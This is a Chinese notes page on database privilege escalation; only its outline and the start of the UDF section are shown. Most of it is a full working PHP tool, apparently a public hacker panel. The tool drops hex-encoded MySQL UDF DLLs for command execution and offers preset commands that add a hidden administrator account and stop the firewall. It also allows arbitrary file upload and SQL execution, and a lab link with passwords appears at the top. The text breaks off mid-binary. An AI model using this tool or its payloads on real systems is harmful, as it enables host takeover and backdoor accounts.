数据库提权【笔记总结】

news2024/11/16 23:59:17

文章目录

  • UDF提权
      • 以有webshell
      • 只有数据库权限
        • 条件
        • 复现
          • msf工具
          • sql语句提权
  • MOF提权
        • 前言
        • 条件
        • 复现
          • msf工具
          • php脚本提权
  • sqlserver提权
      • 前言
      • 条件
      • xp_cmdshell提权
          • 复现
      • 沙盒提权
          • 介绍
          • 复现
  • Oracle提权
      • 靶场搭建
      • 执行任意命令
          • 复现
      • 通过注入存储过程提权(低权限提升至DBA)
          • 原理
          • 利用条件
          • 复现
  • PostgreSQl提权
      • 介绍
      • 复现
          • 创建函数提权
          • 高权限提权
            • 介绍
            • 影响版本
            • 复现

  1. 靶场地址:

    1.  mssql提权,oracle提权(仔细看使用说明,需要修改当前绑定IP)
       https://pan.baidu.com/s/13rdGmscjy-n_iUG1ZyW_Iw?pwd=cong
       解压密码:vmlwrtg%$^sdfgg 
       administrator/abc123!
      
  2. UDF提权

    1. 以有webshell

      1. 通过webshell将脚本上传可访问路径

        1.  <?php
           if (get_magic_quotes_gpc()) { 
           function stripslashes_deep($value) 
           { 
           $value = is_array($value) ? 
           array_map('stripslashes_deep', $value) : 
           stripslashes($value); 
          
           return $value; 
           } 
          
           $_POST = array_map('stripslashes_deep', $_POST); 
           $_GET = array_map('stripslashes_deep', $_GET); 
           $_COOKIE = array_map('stripslashes_deep', $_COOKIE); 
           $_REQUEST = array_map('stripslashes_deep', $_REQUEST); 
           } 
          
           session_start();
           if($_GET['action']=='logout'){
           foreach($_COOKIE["connect"] as $key=>$value){
           setcookie("connect[$key]","",time()-1);
           }
           header("Location:".$_SERVER["SCRIPT_NAME"]);
           }
          
          
          
          
          
          
           if(!empty($_POST['submit'])){
           setcookie("connect[host]",$_POST['host']);
           setcookie("connect[name]",$_POST['name']);
           setcookie("connect[pass]",$_POST['pass']);
           setcookie("connect[db]",$_POST['db']);
           $_COOKIE["connect"]["host"];
           echo "<script>location.href='?action=connect'</script>";
           }
          
          
          
          
          
           if(empty($_GET["action"])){
           ?>
          
          
           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
           <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
           <title>暗月mysql全版本通杀提权神器(mOon原创)</title>
           </head>
          
          
          
          
          
          
          
          
           <body>
           <form method="post" action="?action=connect">
           <table  border="1" align="center" width="300">
            <caption><h5>暗月mysql全版本通杀提权神器(mOon原创)</h5></caption>
           <tr>
           	<td width="50">HOST:</td>
           	<td width="450"><input type="text" name="host" value="localhost" size="40"></td>
           </tr>
           <tr>
           	<td>NAME:</td>
           	<td><input type="text" name="name" value="root" size="40"></td>
           </tr>
           <tr>
           	<td>PASS:</td>
           	<td><input type="text" name="pass" value="" size="40"></td>
           </tr>
          
           <tr>
           	<td>DB:</td>
           	<td><input type="text" name="db" value="mysql" size="40"></td>
           </tr>
          
           <td colspan="2"><div align="center">
                     <input type="submit" name="submit" value="提交">
           		   
                     <input type="reset" name="Submit" value="重置">
                   </div></td>
           </table>
          
          
           </form>
           <div align="center"><strong>Copyright By mOon 2014</strong><br>
           <span> <font color="red">黑客居家旅游杀人放火爆菊必备暗器</font></span><br>
           Blog:<a href="http://www.moonsec.com" target="_blank">www.moonsec.com</a> Bbs:<a href="http://www.moonsafe.com" target="_blank">www.moonsafe.com</a>
           <a href="http://www.moonsec.com" target="_blank">版本更新</a>
           </div>
          
           </body>
           </html>
          
          
          
           <?php
           exit;
          
           }
          
          
          
           echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />';
          
          
          
          
           $link = mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["name"],$_COOKIE["connect"]["pass"]);
          
           if(!$link){
           echo "连接失败.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
           exit;
           }else{
           echo "连接成功<br>";
           echo "版本信息:<br>";
           $str=mysql_get_server_info();
           echo 'MYSQL版本:'.$str."<br>";
           foreach(_ver() as $key=>$value){
           echo $key."-----".$value."<br>";
           } 
           echo "<hr>";
           if($str[2]>=1){
           $pa=str_replace('\\','/',_dir());
            $path=$_SESSION['path']=$pa."/moonudf.dll";
           }else{
           $path=$_SESSION['path']='C:/WINDOWS/moonudf.dll';
           }
          
           }
          
           $conn=mysql_select_db($_COOKIE["connect"]["db"],$link);
           if(!$conn){
           echo "数据不存在.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
           exit;
           }else{
           echo "数据库--".$_COOKIE['connect']['db']."--存在<br>";
           }
           echo '<a href="?action=logout">点击退出</a><br>';
          
           echo '<form action="" method="post" enctype="multipart/form-data" name="form1">';
           echo  '<table width="680" height="53" border="1">';
           echo    '<tr>';
           echo      '<td colspan="2">当前路径:';  
           echo      "<input name='p' type='text' size='100' value='".dirname(__FILE__)."\'></td>";
           echo    '</tr>';
           echo    '<tr>';
           echo     '<td width="235"><input type="file" name="file"></td>';
           echo      '<td width="46"><input type="submit" name="subfile" value="上传文件"></td>';
           echo    '</tr>';
           echo  '</table>';
           echo'</form>';
           if($_POST['subfile']){
           $upfile=$_POST['p'].$_FILES['file']['name'];
          
           if(is_uploaded_file($_FILES['file']['tmp_name']))
           			{
           if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){
           echo '上传失败';
           }else{
           echo '上传成功,路径为'.$upfile;
           	  }
          
           			}
          
           					}
          
           echo '<hr>';
           echo '选择UDF导出的版本 win32 & win64 默认32位';
           echo '<form action="?action=dll" method="post"/>';
           echo '<input type="radio" name="udf" value="32" checked="checked">win32&nbsp';
           echo '<input type="radio" name="udf" value="64">win64&nbsp';
           echo '<hr>';
           echo '<table cellpadding="1" cellspacing="2">';
           echo '<tr><td>路径目录为:</td></tr>';
           echo "<tr><td><input type='text' name='dll' size='100' value='$path'/></td>";
           echo '<td><input type="submit" name="subudf" value="导出udf"/></td></tr>';
           echo '</table>';
           echo '</form>'; 
           echo '<hr>';
          
          
          
           if($_POST['subudf']){
          
           	if($_POST['udf']=="32"){
          
           			$shellcode=mysql86();
          
           	}else{
           			$shellcode=mysql64();
           	}
          
          
           mysql_query('DROP TABLE Temp_udf');
           $query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');
           if(!$query){
           echo '创建临时表Temp_udf失败请查看失败内容'.mysql_error();
           }else{
           $query="INSERT into Temp_udf values (CONVERT($shellcode,CHAR));";
           if(!mysql_query($query)){
           echo 'udf插入失败请查看失败内容'.mysql_error();
           }else{
           $query="SELECT udf FROM Temp_udf INTO DUMPFILE '".$path."';" ;
           if(!mysql_query($query)){
           echo 'udf导出失败请查看失败内容'.mysql_error();
           }else{
           mysql_query('DROP TABLE Temp_udf');
           echo '导出成功';
           }
           }
           }
           }
          
          
           echo '<form name="form2" method="post" action="">';
           echo  '<table width="680" height="100" border="1.2" cellpadding="0" cellspacing="1">';
           echo    '<tr>';
           echo      '<td width="100">文件路径:</td>';
           echo      '<td width="620"><input name="diy" type="text" id="diy" size="50"></td>';
           echo    '</tr>';
           echo    '<tr>';
           echo      '<td>目标路径:</td>';
           echo      '<td><input name="diypath" type="text" id="diypath" size="27" value="C:/WINDOWS/diy.dll"></td>';
           echo    '</tr>';
           echo    '<tr>';
           echo      '<td colspan="2">';
          
           echo        '<div align="right">';
           echo          '<input type="submit" name="Submit2" value="自定义导出">';
           echo      '</div></td></tr>';
           echo '</table>';
           echo '</form>';
          
           if(!empty($_POST['diy'])){
           $diy=str_replace('\\','/',$_POST['diy']);
           $diypath=str_replace('\\','/',$_POST['diypath']);
           mysql_query('DROP TABLE diy_dll');
           $s='create table diy_dll (cmd LONGBLOB)';
           if(!mysql_query($s)){
           echo '创建diy_dll表失败'.mysql_error();
           }else{
           $s="insert into diy_dll (cmd) values (hex(load_file('$diy')))";
           if(!mysql_query($s)){
           echo "插入自定义文件失败".mysql_error();
           }else{
           $s="SELECT unhex(cmd) FROM diy_dll INTO DUMPFILE '$diypath'";
           if(!mysql_query($s)){
           echo "导出自定义dll出错".mysql_error();
           }else{
           mysql_query('DROP TABLE diy_dll');
           echo "成功出自定义dll<br>";
           }
          
           }
          
           }
          
           }
          
           echo "<hr>";
           echo '自带命令:<br>';
           echo '<form action="" method="post">';
           echo '<select name="mysql">';
           echo '<option value="create function sys_eval returns string soname \'moonudf.dll\'">创建sys_eval</option>';
           echo '<option value="select sys_eval(\'net user moon$ 123456 /add & net localgroup administrators moon$ /add\')">添加超级管理员</option>';
           echo '<option value="select sys_eval(\'net user\')">查看用户</option>';
           echo '<option value="select sys_eval(\'netstat -an\')">查看端口</option>';
           echo '<option value="select sys_eval(\'net stop sharedacess\')">停止防火墙</option>';
           echo '<option value="select name from mysql.func">查看创建函数</option>';
           echo '<option value="delete from mysql.func where name=\'sys_eval\'">删除sys_eval</option>';
           echo '</select>';
           echo '&nbsp<input type="submit" value="提交" />';
           echo '</form>';
          
           echo '<form action="?action=sql" method="post">';
           echo '自定义SQL语句:<br>';
           echo '<textarea name="mysql" cols="90" rows="10"></textarea>';
           echo '&nbsp<input type="submit" value="执行" />';
           echo '</form>';
          
           echo "回显结果:<br>";
           echo '<textarea cols="90" rows="10" id="contactus" name="contactus">';
           if(!empty($_POST['mysql'])){
           echo "SQL语句:".$sql=$_POST['mysql']."\r\n";
          
           $sql=mysql_query($sql) or die(mysql_error());
           while($rows=@mysql_fetch_row($sql)){
           foreach($rows as $value){
          
           echo iconv("UTF-8", "GB2312//IGNORE",  $value);
          
           }
           }
          
           }
          
           echo '</textarea>';
          
           echo '<hr>';
           print("
           本版支持mysql win32 & win64位 提权
           但是少了某些提权功能,例如反弹函数。
           需要使用反弹函数 请使用以前的版本,但是不支持64位的mysql。
          
           ");
          
          
           function _dir(){
           	$sql="SHOW VARIABLES LIKE '%plugin_dir%'";
           	$row=mysql_query($sql);
           	$rows=mysql_fetch_row($row);
           	return  $rows[1];
          
           }
           function _ver(){
           	$_version=array();
           	$sql="show variables like '%version%'";
           	$row=mysql_query($sql);
           	while($rows=mysql_fetch_row($row)){
          
           	$_version += array($rows[0]=>$rows[1]);
          
          
           	}
           	return $_version;
          
          
           }
          
          
          
           function mysql86(){
          
          
           return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000F2950208B6F46C5BB6F46C5BB6F46C5B9132175BB4F46C5B9132115BB7F46C5B9132025BB4F46C5B9132015BBBF46C5B75FB315BB5F46C5BB6F46D5B9AF46C5B91321D5BB7F46C5B9132165BB7F46C5B9132145BB7F46C5B52696368B6F46C5B0000000000000000504500004C0103004E10A34D0000000000000000E00002210B010800001000000010000000600000D07B0000007000000080000000000010001000000002000004000000000000000400000000000000009000000010000000000000020000000000100000100000000010000010000000000000100000007882000008020000B0810000C800000000800000B001000000000000000000000000000000000000808400001000000000000000000000000000000000000000000000000000000000000000000000009C7D00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000000000000000000000000000800000E055505831000000000010000000700000000E000000040000000000000000000000000000400000E02E7273726300000000100000008000000006000000120000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303500555058210D09020947A37B47FAE6101946550000C90B000000200000260000A4FFFFFFFF8B4C240833C03901741656578B7C24146A0C59BE000010DCF3A566A55FB0015EAEFDBBFDC3C38B44240C1B6A071711108BF81933FFDFEDB7181DA45FC7011E12005E210883380175128B40040DF6776F0700750A1004C6000132C0C3540A6F2FF68D3C3054A455322D08FF30BFBDFBDDFF156D8885C05975085614C601011BC8568D7101FFDBB7FF8A114184D275F98B54142BCE890A32558BEC8B4D0C8339022D36D86F5374148B7D10915C54536F67EFF7EB4C8B417D740F1B707C1BEBE58366ECFFED6004001A0C8B48048B008D4401025072A037F2DD6E4E08891875113006A44CDD96EFEDEBB2B85F5E5DA3040C287408DBF6C79E33A8591353568B742410D8785346BB707B6B02B6460851C78D5C4357E824CEDDFD770AB81400C604070008FF70041E05767B43B2531A22C4185357200300544126E136086A995B420B7E780A84033B9859991A83EC0CFB5BFBEB9735D9576800F15CD66A018945FC06BB75DD7F8BF08B450CC60600326848C03733FF396DEDEF1E9C8B1D0590506A04FF75FC2AACD37D2EBCBD991CEB402DFC8D487E10402BC1B68D6DBF18F803C7505606F4348C2BF851BBB5B1BB3003FE5710940BD47DF44463EEC21741202F75BC131CA40B03FBFF803E0059741A8BC6C64437FF00567B14DF3AB68589B3066C18285F205E5BC9C3D6B6AE73F3C951F77D5247E3306DDB2CCB5008C9C26A98F0BF1726B4B710548D4601B23B5C4F08EDDB09EE56FF31BBA0947E0C6AFF8DC082B55D7B2082EE02F8092C0FDBC6C123005FEE5E6B6A0C125E58F886909609848365FC1D4550D0EB075BD85ED81B405F65E8C742FE24FF0D0BDB855F1FC9C24E3B0D08209602DBCEFEEDF3C3E908065556688000005680965608B8BFCB1F8485F65959A32354045075054BFEED762FAC8326004308166D083E0904C70424FF098FDD06075D0B5933C0CF5533ED3BC5750EDD7F85DD392D66107E2B6E1083F8018B0810DD7D77E1548B09DB57890A23440F85CC7964A118771C61C3058104C2385521234CEB0DF6DFB5184D9D051A3BC7741768E803A03CEE76C3B6FF57A1D396E7EB036645A12BB7FBFBB7480D6A025F74096A1FE056EB3C9E10C80460FADCF7C0C7051F015E1A50267FDF77B6C007581720BC04B81B4A5989F784A6B13D4BEDBC5504408312C97DEFD258851E6807E4DE4294BBBD7769FF321C57042618FF05E0BD6F6BDF5414F7D38ECD3DCAB6C6809DC90BBE55C75BD783BD10EBBEEBB91402740AB759BE8D1DB6EB4835713B78258BD885DBB8B410DB6C3414EED7E1F8EBF45F68DA4607C102DC83EF043BFB73F1530811C682CA067CAAB4307B1B8525E32D60C77C6C7CC9BC985B5DC20C3E1029286FB86F8D8B8FF28B5D081C73E433C9F04DBBD2894D376A2008683BF1751039FFC75688B60C17E426103BF0740583FE5BA1F5EE02752EB910D03BC148897FD0DB39F7773B837DE4000F8493F6115A037F147D27D99AA71280096227FEAC9DDD6D1324FB2057501357A72F8DF6BAD852D90611537C67BB617F6A0375434F34032168746D3CECB02E2C257FEB1BF0ECA3F0BD75BB09AAE05051595CE7F9413AB5D20B2F0F013D46DA761906292AE407C31B6D5B8DAEEC16FFD79A089A052CD0307CD600D688BC109B0C770DAB0C10051E5936C981ECE18F0D8628C55D2120BC211C895A3F3EECB8211889B3211438211041210C7DED6BDF668C183806252C062008A9344BB306050425001A6C63EDFBFC9C8F14309156240704ACFDB7F428F20807348B85E0FC9CA6B67B5B6370C201A11C19202413778E513A1809C9E0201C1DB37CEE25D38985D8320A04DC7E8D6F04FF24346879DF945963EC63B04128FAD40A2CE7BDC3B6DA20110823685B9E0A678D1B3068342F033C887C5CF81E9A5B6A144650C0C391C1B435D659E7F85A1B63ED324D3970D7619FB8363BFC37AC598B2E2827ADD0BA60D90AE0F3B903B16DFBDCE450352AA612DC0AE45440DB626C60D6D30FE009859710C3D4E5D107FB371DDAD984DCD166A09EC3BB0E6EFF1A65F7D81BC00359487EB8B018BF2DB1D57A0451E5735806B0D2CB2049C6F772F11F23C28E90672020CC00D0FA054727D281394D5A748BA1F09728EE973C03C1813850CE4936F85B69F04F1878180B010F941DC1FC3612C336844825C80FB74114121BDF0A0505710633D2EC57C9FABF9DF80818761E201D0C3BF972098B580803D9D4FEB758E07221C20183C0283BD672E660619241C0C2E970BA0330D0FD7AF00052996C59AB3DF94B7CC7365D50109C59112B29244F07E1F6C1E81FF7C3E00134EB202E00C1AC636B01A33D3EC0A2B11D85942845AB105805E3A491914C50AC2D13348483A1D287206DEADC35936B204A2CE7A309E1646DA91938DE09F3186C036D0C039B8D2BE0FAA8316AC1DA89F633C5508973810B796DEF0D139E04F064A337904DC3BBDBA9096900595FFA8BE55D51D8C3BB1BD810036803276850F9C4CEC2C5B28C3E1064F82D222D20F8FEA0BF4EE640BB1ABC1958D3BB86360D85C32C33B63F15101404EB605671F8E3C61E6BED448B75948E0B1033F00714EDCC95411899271CB0E0BED1DAF4330C11137507BE4F59C02FD12EE285F30AF7C1E0100BF006E1638F4400F7D607045E5F5B495C464646C6056064686C0064474674B00000472FEC0003360F201801FF7FFBFF4E6F20617267756D656E7473096C6C6F77656420287564663A206CDCDF76FF69625F6D7973716C0D5F73085F696E666F29396DFBFFC8182076657273696F6E20302E01341FBFBDDDFD45787065637447657861076C79201A6520737472B5ADB56F3F672074791B7572617105EC00B621722B747791FD36B0801F3F8672206E616D1D7BFB8148436F756C246E6F74C463618375DBB61320186D2779AF72F148A9DD44093F2003121013DF8B05F6E119216B07D0D6D5B0200F1F2D07293BAC7B05F90B0D17CC27DD099BB0070FD81F0928033C92E85E611F030F0313E944D9000000EC1B6814E5B119BF44FF00515565110FC9A8AAB200AA645455555532AA8EA22A195C03E07FFB0410020157616974466F725388BF35007E6C654F626A99145669727475FB9B03E0616C41760D536574456E7612B6DF01706F6EC05661726961622B41753700DE184372659454680664FBADFBB60D47264375727222502A636573734914F0C1660926135469636BDB7EB701DE6E6B5175657279500366840D80587B6D616E3716FDF6F6B3F70144697367374C6962727879436192B6D6FEDB731A4973446562756767266A6865DBDB76F746A4556E684064316445784670ADB0D8DB7469AF46696C4A1957D8B694B41254176D0DD86B0D6F321149900A6B409DB9E6DC766D70876547517F77B72C61AD5551221B5C7517DA76537973186DEE3941737365EDA161E10975697C4C7D5F686FDFED0A7E396D5F2E5F616D7367087869740BD86F7F0B646A753A5F66646976260ADC0F76A1639A5F64FD5F686F6F6B13B800B6D61459725F4875017C01D15F49735EC16DCE0A330A6C21539C82056BF82A64D46E64133D6184C90F651E5F2C72346BCDB5AD56ED6D1C18700A036EDF177B5F706F52296E106468756CC9DEA3F05EB92A9B1B6CB7B5652CA8066EC5726525BD6D705B0866115673749C637079AE3517C108243932C06EADE1F6664D0FD76F7319663A1DC2F60F1F5F437070583174BC6DFFFF63AF343F0018183D193C1C1B161E552719111F0A062FFFFFFFFF111D5F10130A070D2E15090905140C1B08090B150618141505061B050C0D0608FDDBBFFD190613050D0F120F1D07050509062E0D18532D483406B7DB72F20007080C3B060A390C05DF6E6FB710070616120E0B06420B215637051F05776FB7EE9F0E5D2C0D001D4C61230D0C2E24080B97FFB7634106F0021004F02C01043808041C1C040090FE1D05ED4C0105004E10A34D867E93B6FFE00002210B0108080C8E003816B6B1B1C10B200E100B020204FEEC61C1330700600C4B070100023C1BD8C12A00100706C026DFB62B04A420AC22033C1440EB0D60750B0113509F3AB72CF62AC8214200A7BB0B0359B82F2EAB787407C20A271BD860900CC442602E61B0DBD27264746108C508FB0A139AED862D0077402E26943DA1DBC20304301B001A27061BECDBC04F73726300EB40271CF8A311C04F5C6D009A01DF948C4D03271E421BA000B463B72303D152127353030000000000000012FF00000000000000807C2408010F85B901000060BE007000108DBE00A0FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B92B0000008A07472CE83C0177F7803F0075F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE005000008B0709C0743C8B5F048D8430B071000001F35083C708FF96EC710000958A074708C074DC89F95748F2AE55FF96F071000009C07407890383C304EBE16131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAEF47100008DBE00F0FFFFBB0010000050546A045357FFD58D870702000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E99F98FFFF000000480000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000101022001001000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005C80000052010000E404000000000000584000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564338302E435254222076657273696F6E3D22382E302E35303630382E30222070726F636573736F724172636869746563747572653D2278383622207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E50410000000000000000000000000C820000EC810000000000000000000000000000198200000482000000000000000000000000000000000000000000002482000032820000428200005282000060820000000000006E820000000000004B45524E454C33322E444C4C004D5356435238302E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C467265650000006672656500000000000000004D10A34D0000000054830000010000001200000012000000A0820000E8820000308300002210000021100000001000008F120000211000008C120000C51100002110000087110000B311000021100000871100007710000021100000441000002F1100001B110000AA100000698300007F8300009C830000B7830000C3830000D6830000E7830000F0830000008400000E8400001784000027840000358400003D8400004C84000059840000618400007084000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E6974000000000070000010000000DD3BD83DDC3D00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
          
          
          
           }
          
           function mysql64(){
          
           return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000F00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000033C2EDE077A383B377A383B377A383B369F110B375A383B369F100B37DA383B369F107B375A383B35065F8B374A383B377A382B35BA383B369F10AB376A383B369F116B375A383B369F111B376A383B369F112B376A383B35269636877A383B300000000000000000000000000000000504500006486060070B1834B0000000000000000F00022200B020900001200000016000000000000341A0000001000000000008001000000001000000002000005000200000000000500020000000000008000000004000033CE000002004001000010000000000000100000000000000000100000000000001000000000000000000000100000000039000005020000403400003C00000000600000B002000000500000680100000000000000000000007000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300000700100000000000000000000000000000000000000000000000000002E7465787400000011100000001000000012000000040000000000000000000000000000200000602E72646174610000050B000000300000000C000000160000000000000000000000000000400000402E64617461000000D8050000004000000002000000220000000000000000000000000000400000C02E7064617461000068010000005000000002000000240000000000000000000000000000400000402E72737263000000B0020000006000000004000000260000000000000000000000000000400000402E72656C6F630000240000000070000000020000002A00000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000833A007450488B05A4210000498900488B05A221000049894008488B059F21000049894010488B059C21000049894018488B059921000049894020488B0596210000498940280FB705932100006641894030B001C332C0C3CCCCCCCCCCCCCCCC488B0581210000498900488B057F21000049894008488B057C210000498940108B057A210000418940180FB70573210000664189401C0FB605692100004188401E41C7011E000000498BC0C3CCCCCCCC833A01750F488B42088338007506C6010132C0C3488B053D210000498900488B053B21000049894008488B053821000049894010488B053521000049894018488B0532210000498940200FB7052F21000066418940280FB605252100004188402AB001C3CCCCCCCCCCCCCCCCCCCCCCCC40534883EC20488B4A10498BD9488B09FF15DA1F00004C8BD84885C0750E488B4C2450C601014883C4205BC348897C243033C04883C9FF498BFBF2AE488B7C2430498BC348F7D148FFC9890B4883C4205BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC48895C2408574883EC20833A02498BD8488BF97455488D0D64EEFFFF488B8138320000498900488B814032000049894008488B8148320000498940108B8150320000418940180FB78154320000664189401C0FB681563200004188401EB001488B5C24304883C4205FC3488B4208833800744A488D0D06EEFFFF488B8158320000498900488B816032000049894008488B816832000049894010488B817032000049894018488B817832000049894020B001488B5C24304883C4205FC3C7400400000000488B42188B48048B008D4C0102FF15E91E0000488947104885C0753F488D0D99EDFFFF488B8180320000488903488B818832000048894308488B8190320000488943100FB7819832000066894318B001488B5C24304883C4205FC332C0488B5C24304883C4205FC3CCCCCCCC4883EC28488B49104885C97406FF158D1E00004883C428C3CCCCCCCCCCCCCCCC48895C24084889742410574883EC20488B4218488B7110488BFA488B5210448B00488BCE488B12498D5C3001E8750C00004C8B5F18488BCB418B03C6043000488B4718488B5710448B4004488B5208E8520C00004C8B5F18488BD3418B4304488BCEC6041800FF15D41C0000488B5C2430488B74243848984883C4205FC3CCCC833A01750C488B4208833800750332C0C3488B05A01E0000498900488B059E1E000049894008488B059B1E000049894010488B05981E000049894018488B05951E0000498940200FB705921E000066418940280FB605881E00004188402AB001C3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC4883EC28488B4A10488B09FF155F1D000048984883C428C3CCCCCCCCCCCCCCCC4056574154415541564881EC30040000488B05092C00004833C448898424200400004C8BAC2480040000B9010000004889AC24700400004D8BF1488BFAFF151D1D0000488B4F10488D156E1E00004533E4488B09488BF0FF15FB1C0000488D4C2420BA000400004C8BC0488BE8FF15CD1C00004885C0746648899C24600400004883C9FF33C0488D7C2420F2AE48F7D1428D5C21FF488D79FF488BCE8BD3FF15941C0000418BCC488D5424204803C8448BC7488BF0FF158D1C0000488D4C24204C8BC5BA00040000448BE3FF156F1C00004885C075AA488B9C2460040000488BCDFF15811C0000803E00488BAC2470040000741F4883C9FF418D4424FF488BFEC604300033C0F2AE48F7D148FFC941890EEB0541C6450001488BC6488B8C24200400004833CCE8150100004881C430040000415E415D415C5F5EC3CCCCCCCCCC32C0C3CCCCCCCCCCCCCCCCCCCCCCCCCCC20000CCCCCCCCCCCCCCCCCCCCCCCCCC48895C24084889742418574883EC30488B7A104883C9FF33C0488B3F488BF2448D4840F2AE41B80010000048F7D1488BD1488D79FF33C9FF158B1A0000488B56104C8BC7488B12488BC8488BD8FF15951B0000488D5424484C8D054100000048895424284C8BCB33C933D2C744242000000000FF155F1A000083CAFF488BC8FF153B1A0000488B5C2440488B74245033C04883C4305FC3CCCCCCCCCCCCCCCCCC4883EC28E817000000EB0033C04883C428C3CCCCCCCCCCCCCCCCCCCCCCCCCCCC55488BEC488B4510FF10C9C3CCCCCCCCCCCCCCCCCCCC66660F1F840000000000483B0DD9290000751148C1C11066F7C1FFFF7502F3C348C1C910E935040000CC40534883EC20B900010000FF15AF1A0000488BC8488BD8FF15AB1A0000488905642F0000488905552F00004885DB75058D4301EB2348832300E816060000488D0D47060000E8F2050000488D0D2F050000E8E605000033C04883C4205BC3CCCC488BC44889580848896810488978184C8960204155415641574883EC2033FF4D8BE04C8BE93BD70F85380100008B054D2900003BC70F8E23010000FFC8448BEF89053A29000065488B042530000000488B5808EB10483BC3741AB9E8030000FF158319000033C0F0480FB11DA82E000075E3EB0641BD010000008B05902E000083F802740FB91F000000E8AF060000E9A1010000488B0D8D2E0000FF156F1900004C8BE0483BC70F8496000000488B0D6C2E0000FF15561900004D8BFC4C8BF0488BE84883ED08493BEC725A48397D0074F1FF15701900004839450074E5488B4D00FF1528190000488BD8FF155719000048894500FFD3488B0D2A2E0000FF150C190000488B0D152E0000488BD8FF15FC1800004C3BFB75054C3BF074A54C8BFB4C8BE3EB97498BCCFF1581190000FF1513190000488905E42D0000488905E52D0000893DC72D0000443BEF0F85E300000048873DBF2D0000E9D700000033C0E9D500000083FA010F85C700000065488B0425300000008BEF488B5808EB10483BC3741AB9E8030000FF155918000033C0F0480FB11D7E2D000075E3EB05BD010000008B05672D00003BC7740CB91F000000E887050000EB3E488D1530190000488D0D19190000C7053F2D000001000000E8620500003BC77584488D15F7180000488D0DE8180000E845050000C705192D0000020000003BEF750A488BC7488705132D000048393D242D00007421488D0D1